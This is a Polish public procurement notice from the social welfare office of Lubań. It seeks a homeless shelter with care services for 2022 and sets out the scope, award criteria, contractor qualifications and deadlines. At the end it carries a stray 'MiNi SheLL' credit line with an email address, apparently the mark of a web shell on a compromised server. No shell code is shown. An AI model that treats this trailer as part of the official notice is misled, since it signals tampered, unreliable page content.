III<br/>a. Świadczenie usług schronienia tj. udzielenie tymczasowego, całodobowego schronienia w schronisku dla osób bezdomnych z usługami opiekuńczymi wraz z zapewnieniem wyżywienia, niezbędnego ubrania, niezbędnych warunków socjalnych dla osób bezdomnych, usług opiekuńczych dla osób bezdomnych, które ze względu na wiek, chorobę lub niepełnosprawność wymagają częściowej opieki i pomocy w zaspokajaniu niezbędnych potrzeb życiowych, ale nie wymagają usług w zakresie świadczonym przez jednostkę całodobowej opieki, zakład opiekuńczo-leczniczy lub zakład pielęgnacyjno-opiekuńczy oraz usług ukierunkowanych na wzmacnianie aktywności społecznej, w miarę możliwości wyjście z bezdomności i uzyskanie samodzielności życiowej.<br/>b. Zamawiający szacuje, że prognozowana liczba osób skierowanych do schroniska z usługami opiekuńczymi w ciągu roku wynosić będzie - 3 osoby bezdomne.<br/>c. Ze względu na specyfikę przedmiotu zamówienia, podana przez Zamawiającego liczba osób jest wielkością szacunkową. Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia liczby osób w zależności od faktycznych potrzeb w tym zakresie, a Wykonawcy z tego tytułu nie będą przysługiwały żadne roszczenia, w tym pieniężne, wobec Zamawiającego. Zamawiający dopuszcza zwiększenie liczby osób, o której mowa w ppkt b maksymalnie o 1 osobę. Zamawiający będzie dokonywał zapłaty za czas faktycznego pobytu osób w schronisku.<br/>d. W przypadku braku osób wymagających schronienia Wykonawca będzie zobowiązany do utrzymania w gotowości 1 miejsca dla potrzeb Gminy Miejskiej Lubań.<br/>e. Wykonawca zobowiązany jest do zapewnienia standardu obiektu i świadczonych usług w schronisku dla osób bezdomnych z usługami opiekuńczymi zgodnie z załącznikiem nr 3 do Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 roku w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. 2018. 896).<br/>f. Wykonawca w ramach usługi schronienia zobowiązany będzie do zapewnienia osobom skierowanym do schroniska:<br/>•	miejsca noclegowego,<br/>•	wyżywienia,<br/>•	odzieży odpowiedniej do indywidualnych potrzeb osoby oraz pory roku,<br/>•	środków czystości,<br/>•	współpracy w realizacji „Programu wychodzenia z Bezdomności”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-02-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gotowość(G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość(O)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający następująco formuje warunki udziału w postępowaniu<br/>a) zdolności do występowania w obrocie gospodarczym (Zamawiający nie określa wymagań w tym zakresie);<br/><br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej o ile wynika to z odrębnych przepisów:<br/>Wykonawca musi figurować w rejestrze podmiotów udzielających tymczasowego schronienia, o którym mowa w art. 48 a ust. 11 ustawy z dnia 12 marca 2004 r. o pomocy społecznej, prowadzonym przez właściwego Wojewodę.<br/><br/>c) sytuacji ekonomicznej lub finansowej (Zamawiający nie określa wymagań w tym zakresie);<br/><br/>d) zdolności technicznej lub zawodowe;<br/>Wykonawca winien udokumentować, że spełnia minimalne standardy obiektu i świadczonych usług w schronisku dla osób bezdomnych zgodnie z załącznikiem nr 2 do Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 roku w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 r. poz. 896). Posiada kompetencje lub uprawnienia do prowadzenia określonej działalności lub czynności związanej z przedmiotem zamówienia, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Posiada zdolności techniczne i zawodowe niezbędne do prawidłowego wykonania usługi .Zamawiający uzna niniejszy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu<br/>5. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, warunki udziału w postępowaniu określone w Rozdziale V muszą spełniać wszyscy Wykonawcy oraz żaden z tych Wykonawców nie może podlegać wykluczeniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">-oświadczenie o niepodleganiu wykluczeniu<br/>-odpis lub informacjia z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca winien udokumentować, że spełnia minimalne standardy<br/>obiektu i świadczonych usług w schronisku dla osób bezdomnych zgodnie z załącznikiem nr 2 do Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 roku w sprawie<br/>minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób<br/>bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018 r. poz. 896). Posiada kompetencje<br/>lub uprawnienia do prowadzenia określonej działalności lub czynności związanej z przedmiotem<br/>zamówienia, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Wykonawca winien<br/>udokumentować, że jest podmiotem, którego cele statutowe obejmują prowadzenie działalności w<br/>zakresie pomocy osobom bezdomnym i jest wpisany do rejestru placówek udzielających<br/>tymczasowego schronienia prowadzonego przez Wojewodę. Posiada zdolności techniczne i zawodowe<br/>niezbędne do prawidłowego wykonania usługi.<br/>Zamawiający uzna niniejszy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu<br/>warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo - Jeżeli oferta wraz z oświadczeniami składana jest przez pełnomocnika należy<br/>do oferty załączyć pełnomocnictwo upoważniające pełnomocnika do tej czynności. Wykonawca,<br/>który polega na zasobach innych podmiotów składa wraz z ofertą oświadczenie podmiotu o<br/>udostępnieniu zasobów wskazujące na okoliczności opisane w rozdziale V ust. 4 pkt 3 SWZ.<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> udzielenie zamówienia: Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W<br/>takim przypadku, warunki udziału w postępowaniu określone w Rozdziale V muszą spełniać<br/>wszyscy Wykonawcy oraz żaden z tych Wykonawców nie może podlegać wykluczeniu. W<br/>przypadku wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze oferta musi<br/>spełniać wymagania określone w art. 58 ustawy PZP, w tym:1) w przypadku Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 58 ust. 2 ustawy PZP<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. W związku z<br/>powyższym niezbędne jest przedłożenie w ofercie dokumentu zawierającego pełnomocnictwo w<br/>celu ustalenia podmiotu uprawnionego do występowania w imieniu Wykonawców w sposób<br/>umożliwiający ich identyfikację. 2) W celu wykazania niepodlegania wykluczeniu z postępowania<br/>o udzielenie zamówienia wymagane jest załączenie do oferty oświadczenia i przedłożenia<br/>dokumentów zgodnie zapisami Rozdziału VI dla każdego wspólnie wnioskującego Wykonawcy<br/>oddzielnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany, jakie strony chciałyby wprowadzić do ustaleń wynikających z niniejszej umowy<br/>wymagają formy pisemnej i zgody obu stron pod rygorem nieważności takich zmian i będą Te<br/>zmiany dopuszczalne wyłącznie w granicach unormowania art. 455 ustawy Prawo Zamówień<br/>Publicznych<br/>b) Strony oświadczają, iż Zamawiający może jednostronnie w trakcie trwania umowy zmienić<br/>postanowienia umowy w zakresie wprowadzonych regulacji prawnych wprowadzonych w życie<br/>po dacie podpisania umowy, wywołujących potrzebę zmiany umowy, wraz ze skutkami<br/>wprowadzenia takiej zmiany<br/>7.5.) Zamawiający uwzględnił aspekty <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu oraz na stronie internetowej www.mops.luban.pl.Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-21 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com